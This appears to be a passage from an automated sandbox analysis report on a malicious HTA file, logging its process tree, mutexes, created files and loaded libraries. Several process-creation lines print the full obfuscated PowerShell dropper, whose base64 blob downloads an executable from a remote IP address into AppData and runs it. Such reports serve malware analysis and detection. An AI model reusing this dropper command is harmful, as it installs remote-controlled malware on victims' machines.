                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-GJDISH
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7088
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpn0qad1.ngf.ps1Jump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: Software\6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: Rmc-GJDISH6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: Exe6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: Exe6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: Rmc-GJDISH6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: 0DG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: Inj6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: Inj6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: BG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: BG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: BG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: @CG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: BG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: exepath6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: @CG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: exepath6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: BG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: licence6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: `=G6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: XCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: dCG6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: Administrator6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: User6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: del6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: del6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: del6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCommand line argument: %c}6_2_007D6277
                Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: newthingswithgreatupdateiongivenbestthingswithme.htaReversingLabs: Detection: 15%
                Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\newthingswithgreatupdateiongivenbestthingswithme.hta"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC255.tmp" "c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe "C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe"
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 656
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 712
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 640
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 736
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 756
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 776
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 784
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 792
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 708
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 720
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe "C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC255.tmp" "c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
